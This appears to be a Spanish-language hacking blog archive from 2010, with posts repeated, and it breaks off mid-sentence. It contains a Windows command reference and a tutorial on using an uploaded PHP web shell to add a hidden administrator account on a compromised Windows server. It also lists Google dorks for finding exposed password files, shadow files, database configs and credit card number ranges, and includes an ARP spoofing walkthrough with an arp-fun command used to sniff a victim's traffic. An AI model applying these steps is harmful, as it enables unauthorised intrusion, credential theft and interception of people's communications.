Windows NT (comandos editados por 3rr0r)
Archivos:
dir [ruta][archivo]: lista los archivos y subdirectorios existentes en la ruta, la opción de archivo admite comodines (*,?):
/A:[atributo] muestra los ficheros con los atributos especificados:
D: directorios
H: archivos ocultos
S: archivos de sistema.
R: archivos de solo lectura.
A: archivos para archivar
-: este prefijo niega el atributo.
/B: formato simple de presentación de datos.
/O:[orden]: muestra los archivos ordenados según:
N: nombre.
E: extensión
S: tamaño
D: fecha y hora
G: agrupa los directorios primeros
-: invierte el orden alfabético.
/w ó /D: formatos anchos de presentación de archivos.
/P: hace una pausa después de cada pantalla completa
move (confirmación) [ruta-origen/nombre-archivo] [ruta-destino]: mueve ficheros de un origen a un destino. En el caso de directorios la opción los cambia de nombre.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
copy [archivo] [destino]: copia un archivo a un origen a un destino.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
Para concatenar fichero se puede usar la orden copy; el formato es copy archivo-receptor archivo1+archivo2+.....
del (opciones)[archivo]: borra archivos
/P pide confirmación de la eliminación
/F fuerza la eliminación de archivos de solo lectura.
/S elimina los archivos especificados en todos los subdirectorios.
/Q no pide confirmación.
/A:[atributo] elimina archivos en función a los atributos.
xcopy [origen] [destino] (opciones) copy ficheros y directorios desde un origen a un destino. El número de opciones es muy alto
mkdir [nombre]: crea un directorio.
rmdir (opciones)[directorio]: borra un directorio.
/S borra ficheros y subdirectorios situados por debajo del directorio.
/Q no pide confirmación de borrado.
cd [directorio]: cambia de directorio, si no se le pasa ningún parámetro nos pasa a nuestro directorio.
rename [origen][destino]: cambia el nombre del fichero
attrib [atributos][archivo](opciones) : cambia los atributos de un archivo o archivos
atributos: son los señalados anteriormente y se preceden de un signo – para
eliminar el atributo y de un signo + para activarlo
/S procesa los archivos que coincida en todas las carpetas.
/D procesa carpetas.
Búsquedas:
Find (opción) “cadena” [ruta-archivo]: busca una cadena de texto en uno o varios archivos
/V muestra todas las líneas que no tienen la cadena.
/C muestra solamente el número de líneas que contienen la cadena
/N muestra el número de línea que corresponde a cada línea.
/I omite mayúsculas/minúsculas en la cadena.
Findstr: busca cadenas en los archivos al igual que find, pero las posibilidades de formateo son mayores
Procesos:
Los comandos de procesos se realizan en modo gráfico, no hay versión en modo texto.
Herramientas de disco:
recover ruta-archivo] permite recuperar información de archivos dañados.
Format [unidad] (opciones): da formato de archivos a una unidad o volumen, los sistemas de archivos soportados son FAT, FAT32, UDF y NTFS. Las opciones son numerosas, las principales son:
/Q formato rápido.
/FS:sistema-archivos: especifica el sistema de archivos.
/V:etiqueta: establece la etiqueta de volumen.
/F: establece el formato de disco en disquetes de 3 1/2
Subst [unidad-virtual] [ruta-física]: asigna una unidad a una ruta especifica.
/D elimina el enlace.
Tree [unidad-ruta](opciones): muestra en forma de árbol la estructura de directorios:
/F incluye en la muestra los archivos existentes
/A usa texto ASCII para dibujar el árbol de directorios.
Vol: muestra la etiqueta de un volumen.
Paginadores:
more (opciones)[archivo]: muestra el contenido de uno o varios archivos en pantalla página a página, la separación de archivos se realiza por un espacio en blanco.
/E activa loas acciones avanzadas
/C limpia la pantalla antes de mostrar la siguiente
/P expande los caracteres de avance de línea.
/S comparta varias líneas consecutivas en blanco en una
+n comienza a mostrar el contenido del fichero en la línea n
Si las opciones extendidas están activas, las posibilidades en la línea de de espera (--Más--) son:
P n muestra las siguientes n líneas.
S n saltarse las siguientes n líneas
F mostrar el siguiente archivo
Q salir
Type [archivo]: parecido a more pero menos completo.
Ayuda.
help [comando]: ofrece en pantalla una explicación del comando.
help: resumen de comandos
att: 3rr0r
dimarts, 21 de desembre del 2010
Comandos utiles Windows NT
Windows NT (comandos editador por 3rr0r)
Archivos:
dir [ruta][archivo]: lista los archivos y subdirectorios existentes en la ruta, la opción de archivo admite comodines (*,?):
/A:[atributo] muestra los ficheros con los atributos especificados:
D: directorios
H: archivos ocultos
S: archivos de sistema.
R: archivos de solo lectura.
A: archivos para archivar
-: este prefijo niega el atributo.
/B: formato simple de presentación de datos.
/O:[orden]: muestra los archivos ordenados según:
N: nombre.
E: extensión
S: tamaño
D: fecha y hora
G: agrupa los directorios primeros
-: invierte el orden alfabético.
/w ó /D: formatos anchos de presentación de archivos.
/P: hace una pausa después de cada pantalla completa
move (confirmación) [ruta-origen/nombre-archivo] [ruta-destino]: mueve ficheros de un origen a un destino. En el caso de directorios la opción los cambia de nombre.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
copy [archivo] [destino]: copia un archivo a un origen a un destino.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
Para concatenar fichero se puede usar la orden copy; el formato es copy archivo-receptor archivo1+archivo2+.....
del (opciones)[archivo]: borra archivos
/P pide confirmación de la eliminación
/F fuerza la eliminación de archivos de solo lectura.
/S elimina los archivos especificados en todos los subdirectorios.
/Q no pide confirmación.
/A:[atributo] elimina archivos en función a los atributos.
xcopy [origen] [destino] (opciones) copy ficheros y directorios desde un origen a un destino. El número de opciones es muy alto
mkdir [nombre]: crea un directorio.
rmdir (opciones)[directorio]: borra un directorio.
/S borra ficheros y subdirectorios situados por debajo del directorio.
/Q no pide confirmación de borrado.
cd [directorio]: cambia de directorio, si no se le pasa ningún parámetro nos pasa a nuestro directorio.
rename [origen][destino]: cambia el nombre del fichero
attrib [atributos][archivo](opciones) : cambia los atributos de un archivo o archivos
atributos: son los señalados anteriormente y se preceden de un signo – para
eliminar el atributo y de un signo + para activarlo
/S procesa los archivos que coincida en todas las carpetas.
/D procesa carpetas.
Búsquedas:
Find (opción) “cadena” [ruta-archivo]: busca una cadena de texto en uno o varios archivos
/V muestra todas las líneas que no tienen la cadena.
/C muestra solamente el número de líneas que contienen la cadena
/N muestra el número de línea que corresponde a cada línea.
/I omite mayúsculas/minúsculas en la cadena.
Findstr: busca cadenas en los archivos al igual que find, pero las posibilidades de formateo son mayores
Procesos:
Los comandos de procesos se realizan en modo gráfico, no hay versión en modo texto.
Herramientas de disco:
recover ruta-archivo] permite recuperar información de archivos dañados.
Format [unidad] (opciones): da formato de archivos a una unidad o volumen, los sistemas de archivos soportados son FAT, FAT32, UDF y NTFS. Las opciones son numerosas, las principales son:
/Q formato rápido.
/FS:sistema-archivos: especifica el sistema de archivos.
/V:etiqueta: establece la etiqueta de volumen.
/F: establece el formato de disco en disquetes de 3 1/2
Subst [unidad-virtual] [ruta-física]: asigna una unidad a una ruta especifica.
/D elimina el enlace.
Tree [unidad-ruta](opciones): muestra en forma de árbol la estructura de directorios:
/F incluye en la muestra los archivos existentes
/A usa texto ASCII para dibujar el árbol de directorios.
Vol: muestra la etiqueta de un volumen.
Paginadores:
more (opciones)[archivo]: muestra el contenido de uno o varios archivos en pantalla página a página, la separación de archivos se realiza por un espacio en blanco.
/E activa loas acciones avanzadas
/C limpia la pantalla antes de mostrar la siguiente
/P expande los caracteres de avance de línea.
/S comparta varias líneas consecutivas en blanco en una
+n comienza a mostrar el contenido del fichero en la línea n
Si las opciones extendidas están activas, las posibilidades en la línea de de espera (--Más--) son:
P n muestra las siguientes n líneas.
S n saltarse las siguientes n líneas
F mostrar el siguiente archivo
Q salir
Type [archivo]: parecido a more pero menos completo.
Ayuda.
help [comando]: ofrece en pantalla una explicación del comando.
help: resumen de comandos
att: 3rr0r
Archivos:
dir [ruta][archivo]: lista los archivos y subdirectorios existentes en la ruta, la opción de archivo admite comodines (*,?):
/A:[atributo] muestra los ficheros con los atributos especificados:
D: directorios
H: archivos ocultos
S: archivos de sistema.
R: archivos de solo lectura.
A: archivos para archivar
-: este prefijo niega el atributo.
/B: formato simple de presentación de datos.
/O:[orden]: muestra los archivos ordenados según:
N: nombre.
E: extensión
S: tamaño
D: fecha y hora
G: agrupa los directorios primeros
-: invierte el orden alfabético.
/w ó /D: formatos anchos de presentación de archivos.
/P: hace una pausa después de cada pantalla completa
move (confirmación) [ruta-origen/nombre-archivo] [ruta-destino]: mueve ficheros de un origen a un destino. En el caso de directorios la opción los cambia de nombre.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
copy [archivo] [destino]: copia un archivo a un origen a un destino.
/Y: no pide confirmación de la operación.
/-Y: pide confirmación de la operación.
Para concatenar fichero se puede usar la orden copy; el formato es copy archivo-receptor archivo1+archivo2+.....
del (opciones)[archivo]: borra archivos
/P pide confirmación de la eliminación
/F fuerza la eliminación de archivos de solo lectura.
/S elimina los archivos especificados en todos los subdirectorios.
/Q no pide confirmación.
/A:[atributo] elimina archivos en función a los atributos.
xcopy [origen] [destino] (opciones) copy ficheros y directorios desde un origen a un destino. El número de opciones es muy alto
mkdir [nombre]: crea un directorio.
rmdir (opciones)[directorio]: borra un directorio.
/S borra ficheros y subdirectorios situados por debajo del directorio.
/Q no pide confirmación de borrado.
cd [directorio]: cambia de directorio, si no se le pasa ningún parámetro nos pasa a nuestro directorio.
rename [origen][destino]: cambia el nombre del fichero
attrib [atributos][archivo](opciones) : cambia los atributos de un archivo o archivos
atributos: son los señalados anteriormente y se preceden de un signo – para
eliminar el atributo y de un signo + para activarlo
/S procesa los archivos que coincida en todas las carpetas.
/D procesa carpetas.
Búsquedas:
Find (opción) “cadena” [ruta-archivo]: busca una cadena de texto en uno o varios archivos
/V muestra todas las líneas que no tienen la cadena.
/C muestra solamente el número de líneas que contienen la cadena
/N muestra el número de línea que corresponde a cada línea.
/I omite mayúsculas/minúsculas en la cadena.
Findstr: busca cadenas en los archivos al igual que find, pero las posibilidades de formateo son mayores
Procesos:
Los comandos de procesos se realizan en modo gráfico, no hay versión en modo texto.
Herramientas de disco:
recover ruta-archivo] permite recuperar información de archivos dañados.
Format [unidad] (opciones): da formato de archivos a una unidad o volumen, los sistemas de archivos soportados son FAT, FAT32, UDF y NTFS. Las opciones son numerosas, las principales son:
/Q formato rápido.
/FS:sistema-archivos: especifica el sistema de archivos.
/V:etiqueta: establece la etiqueta de volumen.
/F: establece el formato de disco en disquetes de 3 1/2
Subst [unidad-virtual] [ruta-física]: asigna una unidad a una ruta especifica.
/D elimina el enlace.
Tree [unidad-ruta](opciones): muestra en forma de árbol la estructura de directorios:
/F incluye en la muestra los archivos existentes
/A usa texto ASCII para dibujar el árbol de directorios.
Vol: muestra la etiqueta de un volumen.
Paginadores:
more (opciones)[archivo]: muestra el contenido de uno o varios archivos en pantalla página a página, la separación de archivos se realiza por un espacio en blanco.
/E activa loas acciones avanzadas
/C limpia la pantalla antes de mostrar la siguiente
/P expande los caracteres de avance de línea.
/S comparta varias líneas consecutivas en blanco en una
+n comienza a mostrar el contenido del fichero en la línea n
Si las opciones extendidas están activas, las posibilidades en la línea de de espera (--Más--) son:
P n muestra las siguientes n líneas.
S n saltarse las siguientes n líneas
F mostrar el siguiente archivo
Q salir
Type [archivo]: parecido a more pero menos completo.
Ayuda.
help [comando]: ofrece en pantalla una explicación del comando.
help: resumen de comandos
att: 3rr0r
Roteando Windows con shell en PHP
#############################
Tutorial Roteo de Windows by 3rr0r
#############################
1- Shell en php subida en web
2- Vamos a la DIR de la shell que anteriormente subimos.
3- Nos aparecera una pantalla negra.. por defecto ya esta configurada.
4- Nos dirigimos a la opcion inferior de la pantalla CMD
*Esto seria como una CMD normal i corriente de Windows. Podemos ejecutar comandos
para añadir i modificar usuarios, direcciones, permisos, etc.
################################
Añadiendo USER con default settings
################################
*En la linia de Comando introduciremos el siguiente codigo
--------------------------------------------------------------
Net User (nombre del user que querais) /add
-The command completed successfully.
--------------------------------------------------------------
Os aparecera un mnsj. que dirá lo siguiente más abajo:
-The command completed successfully.
#############################
Saber el nombre del Grupo Root
#############################
Ejecutaremos el comando:
-------------------------------
Net user administrator
-The command completed successfully.
-------------------------------
Abajo de todo nos aparecera el nomber del Grupo.
En mi caso:
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active No
Account expires Never
Password last set 14/07/2009 5:55:45
Password expires Never
Password changeable 14/07/2009 5:55:45
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/07/2009 5:53:58
Logon hours allowed All
Local Group Memberships *Administrators *HomeUsers
Global Group memberships *None
The command completed successfully.
La parte que nos interesa es la que dice lo siguiente:
Local Group Memberships *Administrators *HomeUsers
#######################
Dar permisos root a USER
#######################
Dependiendo de lo que nos ponga en 'Local Group Memberships' ejecutaremos el
siguiente comando:
--------------------------------------------------------
net localgroup administrators USER /add
-The command completed successfully.
--------------------------------------------------------
Donde 'administrators' = El nombre que nos dio Local Group Memberships
i 'USER' es el nombre que introdujimos en el primer comando para añadir
usuario.
Ahora ya tenemos un usuario con permisos ROOT (admin) en ese Windows.
Apartir de aqui ya podeis ejecutar el comando que querais dependiendo de vuestro
objetivo y finalidad.
Att: 3rr0r
Tutorial Roteo de Windows by 3rr0r
#############################
1- Shell en php subida en web
2- Vamos a la DIR de la shell que anteriormente subimos.
3- Nos aparecera una pantalla negra.. por defecto ya esta configurada.
4- Nos dirigimos a la opcion inferior de la pantalla CMD
*Esto seria como una CMD normal i corriente de Windows. Podemos ejecutar comandos
para añadir i modificar usuarios, direcciones, permisos, etc.
################################
Añadiendo USER con default settings
################################
*En la linia de Comando introduciremos el siguiente codigo
--------------------------------------------------------------
Net User (nombre del user que querais) /add
-The command completed successfully.
--------------------------------------------------------------
Os aparecera un mnsj. que dirá lo siguiente más abajo:
-The command completed successfully.
#############################
Saber el nombre del Grupo Root
#############################
Ejecutaremos el comando:
-------------------------------
Net user administrator
-The command completed successfully.
-------------------------------
Abajo de todo nos aparecera el nomber del Grupo.
En mi caso:
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active No
Account expires Never
Password last set 14/07/2009 5:55:45
Password expires Never
Password changeable 14/07/2009 5:55:45
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 14/07/2009 5:53:58
Logon hours allowed All
Local Group Memberships *Administrators *HomeUsers
Global Group memberships *None
The command completed successfully.
La parte que nos interesa es la que dice lo siguiente:
Local Group Memberships *Administrators *HomeUsers
#######################
Dar permisos root a USER
#######################
Dependiendo de lo que nos ponga en 'Local Group Memberships' ejecutaremos el
siguiente comando:
--------------------------------------------------------
net localgroup administrators USER /add
-The command completed successfully.
--------------------------------------------------------
Donde 'administrators' = El nombre que nos dio Local Group Memberships
i 'USER' es el nombre que introdujimos en el primer comando para añadir
usuario.
Ahora ya tenemos un usuario con permisos ROOT (admin) en ese Windows.
Apartir de aqui ya podeis ejecutar el comando que querais dependiendo de vuestro
objetivo y finalidad.
Att: 3rr0r
dilluns, 1 de novembre del 2010
Dorks Parte II
-COMIENZO-
/en google/
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl: passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Se imaginaran q son estos Grin:
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
Directorios y contraseñas al descubierto:
"parent directory " /appz/ -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html
-htm -php -shtml -opendivx -md5 -md5sums
En estas busquedas solo estoy cambiando el nombre
luego de "parent directory " ,cambienlo por lo que
quieran y obtendran distintos resultados.
Intenten con estas busquedas:
?intitle:index.of? mp3
Solo hay q poner le nombre del cantante o cancion
Ejemplo: ?intitle:index.of? mp3 Metallica
inurl:microsoft filetype:iso
Pueden cambiar la busqueda a lo que quieran, ejemplo:
Microsoft a Linux , iso a rar ....
"# -FrontPage-" inurl:service.pwd
Contraseñas de Frontpage Cheesy
"AutoCreate=TRUE password=*"
Contraseñas de "Website Access Analyzer", un programa
japones q crea stadisticas web.
"http://*:*@www" dominio
Contraseñas, solo substituye "dominio" por el dominio
q busques sin el .com .net o lo q sea.
Ejemplo:
"http://*:*@www" micronosoft or
"http://*:*@www"micronosoft
Otro modo es escribiendo:
"http://bob:bob@www"
"sets mode: +k"
Esta busqueda muestra contraseñas de los canales de
IRC en los logs.
allinurl: admin mdb
Bases de datos Grin
allinurl:auth_user_file.txt
Archivo de contraseñas de DCForum's y DCShop(carrito
de compras). Este archivo contiene muchas contraseñas
crackeables, nombres de usuarios y emails.
intitle:"Index of" config.php
Estos archivos nomarlmente contienen el usuarios,dir y
contraseña de las bases de datos.Tendras
administracion total de la DB.
eggdrop filetype:user user
Nombres de usuario y contraseñas en canales de IRC.
intitle:index.of.etc
Esta busqueda te mostrara la pagina principal de la
carpeta etc/ donde se pueden encontrar muchos archivos
importantes y contraseñas, no siempre se encontraran
contraseñas pero puedes encontrar muchas cosas
interesantes aca.
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
Esto mostrara muchos archivos de backups(respaldos)
creados por programas o por el administrador.
Si necesitas buscar algun numero serial para algun
programa,digamos windows XP profesional.
"Windows XP Professional" 94FBR
El 94FBR es devido a q este pedaso de codigo se
encuentra en muchos de los CD-keys de windows, asi q
esto disminuira la cantidad de paginas pornos q
intentan engañarte.
¿Para qué tomarse la molestia de arremeter contra un
sitio web en busca de vulnerabilidades que hayan
pasado inadvertidas cuando se puede entrar con toda
comodidad por la puerta delantera?
Estas intrusiones se pueden realizar gracias a que
existen bases de datos con conexión a Internet. Como
las herramientas de gestión de bases de datos utilizan
plantillas (templates) estandarizadas para presentar
los datos en la Red, al ingresar ciertas frases
específicas el usuario muchas veces puede acceder
directamente a las páginas que utilizan esas
plantillas. Por ejemplo, al ingresar la frase "Select
a database to view" (seleccionar una base de datos
para ver) -una fase habitual en la interfaz de base de
datos FileMaker Pro- en el Google, se obtuvieron
alrededor de 200 links, de los cuales casi todos
conducían a bases de datos creadas con FileMaker a las
que se puede acceder online.
Por ejemplo si usas lo siguiente:
1 - www.google.com
2 - Buscar
"Index of /admin" + passwd
o
"Index of /wwwboard" + passwd
o
"Index of /backup" + mdb
Veras grandes resultados.!
Si escribes lo que aparece abajo en el buscador de
google podras acceder a base de datos, contraseñas,
webs con bugs, hasta a numeros de tarjeta de credito.
Practica un poco y prueba los distintos comandos,
luego crea tus propias lineas para buscar. Un buen
sitio de información de como hackear con google es
http://johnny.ihackstuff.com/ está en inglés, pero no
llegarás a nada si no visitas páginas como esta
filetype:htpasswd htpasswd
intitle:"Index of" ".htpasswd" -intitle:"dist" -apache
-htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl: passlist.txt (para encontrar listas de
passwords)
intitle:"Index of..etc" passwd
intitle:admin intitle:login
"Incorrect syntax near" (SQL script error)
intitle:"the page cannot be found" inetmgr (debilidad
en IIS4)
intitle:index.of ws_ftp.ini
"Supplied arguments is not a valid PostgreSQL result"
(possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
"Index of /backup"
index.of.password
index.of.winnt
inurl:"auth_user_file.txt"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
Index of /" +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl: passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"Index of" passwd
intitle:"Index of" people.1st
intitle:"Index of" pwd.db
intitle:"Index of" etc/shadow
intitle:"Index of" spwd
intitle:"Index of" master.passwd
intitle:"Index of" htpasswd
intitle:"Index of" members OR accounts
intitle:"Index of" user_carts OR user _cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
test-cgi
wwwboard.pl
www-sql
pwd.dat
ws_ftp.log
Revelar datos con Google no parece nada complicado,
especialmente para todos los sistemas mal
configurados... una búsqueda específica permite
mostrar directorios poniendo en un índice y
accediendo, la contraseña, los archivos, los caminos,
etc, etc...
Las Puntas de la búsqueda
las entradas de la búsqueda comúnes debajo de le dará
una idea... por ejemplo si usted quiere buscar el un
índice de "root"
En la caja de la búsqueda puesta exactamente en como
usted véalo debajo
source jhonyyhackstuff.com
Ejemplo 1:
allintitle: "index of/root"
Resultad:
lo que revela es 2,510 páginas que usted puede ver y
posiblemente se encuentre su testamento...
Ejemplo 2:
inurl:"auth_user_file.txt"
Este da un resultado de 414 posibles archivos para
acceder
INVESTIGUE LOS CAMINOS.......
*************************************
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl: passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
~|por 3rr0r|~
diumenge, 26 de setembre del 2010
ARP Spoofing Ilustrado
El ARP Spoofing es una de las muchas variaciones del Spoof que aprovecha las vulnerabilidades del TCP/IP. Esta es una tecnica muy interesante y que seguramente nos va a ser util en mas de una ocasion. La teoria de esta tecnica es muy simple, lo que no lo es tanto es conocer el funcionamiento del protocolo ARP para comprender que es lo que estamos
haciendo; por eso primero empezaremos con una breve y clara (espero..) explicacion del protocolo ARP y luego pasaremos a ver la tecnica del ARP Spoofing en si. Espero que disfruten de la lectura de este texto y les sirva como motivacion para investigar mas sobre el TCP/IP y todas las cosas interesantes y
divertidas que podemos hacer con el.. ;)
1. Protocolo ARP. Como todos saben el TCP/IP es lo que se llama una "suite" de protocolos en el cual se encuentra el ARP(Address Resolution Protocol) entre otros.
En el mundo TCP/IP nos identificamos con las direcciones IP(ej. 192.168.0.1),
pero en una red LAN del tipo ethernet o token ring nos vamos a identificar con la direccion de hardware(ej. 00:E0:7D:77:4E:55) que cada placa de red
posee; se usa este esquema de identificacion ya que por el mismo cable de
la red pueden pasar distintos tipos de protocolos y una direccion IP solo
tiene sentido en la suite TCP/IP.
Si por ejemplo queremos establecer una conexion con un host de la red, lo
que va a hacer el protocolo ARP es fijarse la direccion IP del host y
encargarse de conseguirnos la direccion de hardware.
Conexiones dial-up tipicas como las que hacemos a traves de la linea
telefonica no necesitan usar ARP, ya que no hay en juego ninguna placa de
red y por lo tanto direcciones de hardware que resolver. Si estamos usando Linux y tenemos configurada una placa de red en nuestra
PC, con el siguiente comando podremos ver su direccion de hardware:
[root@ezkracho /]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:E0:7D:77:4E:55
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:5 Base address:0xbc00
La direccion de hardware es grabada en la placa de red por el fabricante y
es unica; cada direccion de hardware es de 48 bits al contrario de las
direcciones IP que son de 32 bits.
Ahora que ya sabemos basicamente que es lo que hace ARP vamos a verlo un
poco mas en detalle, pero sin complicarnos demasiado.
Supongamos que armamos una peque~a red con unos amigos y queremos hacer un
telnet a la computadora de uno de ellos que tiene de host el nombre
"ezkracho".
Antes que nada nuestro cliente de telnet va a convertir el nombre ezkracho
en una direccion IP de 32 bits, esto lo puede hacer buscando en el archivo
/etc/hosts o en un servidor DNS que hayamos instalado.
Una vez que tenemos la direccion IP del host ezkracho el cliente de telnet
le va a decir al TCP que se encargue de establecer una conexion con esa
direccion de IP; aqui el TCP va a enviar un datagrama IP solicitando una
conexion al host ezkracho.
En nuestro ejemplo estamos en una red local comun por lo cual el datagrama
IP puede ir directamente hacia ese host, pero en el caso de que quisieramos
telnetear a un host en una red remota nuestro datagrama IP se rutearia
directamente hacia la salida predeterminada de la red, como por ejemplo un
router y de ahi seguiria hasta el proximo salto hasta llegar a destino.
Como habiamos explicado en una red LAN nos debemos identificar con la
direccion de hardware, por lo que ARP va a convertir nuestra direccion IP de
32 bits en nuestra direccion de hardware de 48 bits.
Luego ARP va a enviar un pedido o lo que se llama un "ARP request" al
broadcast, osea a cada host conectado en nuestra red, en el ARP request va
incluido la direccion IP del host ezkracho y lo que hace es preguntar "si
sos el due~o de esta direccion IP contestame con tu direccion de hardware".
El host ezkracho va a recibir este broadcast con el ARP request preguntando
por el y le va a contestar, esta respuesta se llama "ARP reply" y por
supuesto que en ella va incluida su direccion de hardware.
Una vez que se recibe el ARP reply con la direccion de hardware finalmente
vamos a poder terminar de enviar el datagrama IP al host ezkracho para
entablar la conexion. Y todo esto gracias a ARP :)
Muy bien, ahora que ya comprendemos mejor el funcionamiento de ARP vamos a
explicar que es lo que se conoce como "ARP Cache".
Para hacer mas eficiente el trabajo de resolver cual es la direccion de
hardware de un host cada vez que se la necesita averiguar, existe el ARP
Cache. Cada vez que algun host resuelve una direccion de hardware de otro
host, todos los demas guardan una copia en el cache para despues no tener
que volver a hacer ese mismo trabajo.
Cada direccion de hardware que entra al ARP Cache es guardada por unos 20
minutos(segun el OS), luego de ello se borra y si se la necesita se la tiene
que volver a pedir a menos que ya otro host la haya pedido por lo cual vuelve
a ingresar al cache y durara 20 minutos mas.
En Linux tenemos el comando "arp" que nos sirve para manipular el arp cache
de nuestro sistema. Si queremos ver el cache actual tenemos que hacer:
[root@ezkracho /]# arp -a
ezkracho (192.168.0.1) at 00:E0:7D:77:4E:55
powertech (192.168.0.3) at 00:00:E8:57:82:6B
La opcion "arp -a" nos muestra todas las entradas que hay en nuestro cache,
como vemos primero aparece el host, luego la direccion IP y luego la direccion
de hardware. Tenemos otras opciones del comando arp que tambien nos pueden
ser muy utiles, por ejemplo la opcion "arp -d" que nos permite borrar
cualquier entrada del cache pero esto solo puede ser hecho por el root. Hay
otras opciones interesantes que las pueden investigar poniendo "man arp" en
la consola.
Hay muchas otras cosas que se pueden explicar sobre el protocolo ARP, pero
al fin de este texto que es explicar el ARP Spoofing con esto nos alcanza.
2. ARP Spoofing.
Llegamos a lo divertido! a esta altura los que estuvieron prestando atencion
ya deben tener una idea de que se trata esto del ARP Spoofing, pero como
siempre hay algunos resagados vamos a explicarlo un poco.
Supongamos que yo le envio a un host victima un paquete con la direccion de
hardware de mi placa de red pero con otra direccion IP de un host de la red,
lo que va a suceder es que el host victima va a guardar esa informacion en
su ARP Cache y a partir de ese momento va a creer que nosotros somos otro
host de la red, porque cuando quiera enviarle algo al host que suplantamos
va a buscar la direcion IP en su cache y va a enviar todo a la direccion de
hardware que tenga asignada que por supuesto es la nuestra.
Esta tecnica como ya lo dije antes es muy simple y los diferentes usos que
se le pueda dar solo depende de nuestra imaginacion. Como anecdota, algo en
lo que nos fue muy util esta tecnica fue cuando estabamos en una LAN en una
reunion con gente de la scene Argentina y necesitabamos sniffear a una de
las computadoras de la red, el problema era que en la LAN no habian hubs
porque toda la interconexion era a traves de un switch por lo que el
trafico de la red no pasaba por nosotros y simplemente no podiamos ponernos
en modo promiscuo y comenzar a capturar paquetes. La solucion encontrada fue
muy simple, le enviamos un paquete a nuestra victima con nuestra direccion
de hardware pero con la direccion IP del gateway que nos daba salida a
Internet, luego creamos un alias de la direccion IP del gateway pero en
nuestra ethernet y luego lo forwardeamos al verdadero gateway. En si nuestra
victima, que por cierto son unos chicos que se creen muy bromistas, estuvieron
saliendo a Internet sin darse cuenta que primero pasaban por nosotros y que
los estuvimos sniffeando toda la noche. Quiero aprovechar para saludar a
dr_fdisk^ y airlink que nos dieron una gran mano esa noche ;)
Hay muchos programas que sirven para hacer todo lo comentado pero les
recomiendo el arp-fun de Ulandron(www.undersec.com) que es muy bueno y facil
de usar.
Veamos un ejemplo practico con el arp-fun:
[root@ezkracho /]# arp-fun -i eth0 -s 192.168.0.10 -a 0A:0B:0C:0D:0E:0F //
-d 192.168.0.3 -m 00:00:E8:57:82:6B -v -c 2
Attempting to send 2 packets
Source ip: 192.168.0.10
Dest ip: 192.168.0.3
Everything fine, 'til now. Let's build the packet
Looks nice, huh:
00 0000 57e8 6b82 0b0a 0d0c 0f0e 0608 0100
10 0008 0406 0200 0b0a 0d0c 0f0e a8c0 0a00
20 0000 57e8 6b82 a8c0 0300
Sent packet 1, waiting 0 seconds
Sent packet 2, waiting 0 seconds
Analizemos este ejemplo, aqui vemos que enviamos al host powertech que tiene
la direccion IP 192.168.0.3 y la direccion de hardware 00:00:E8:57:82:6B,
dos paquetes diciendole que somos el host cenobyte que tiene la direccion IP
192.168.0.10 y la direccion de hardware 0A:0B:0C:0D:0E:0F, el host cenobyte
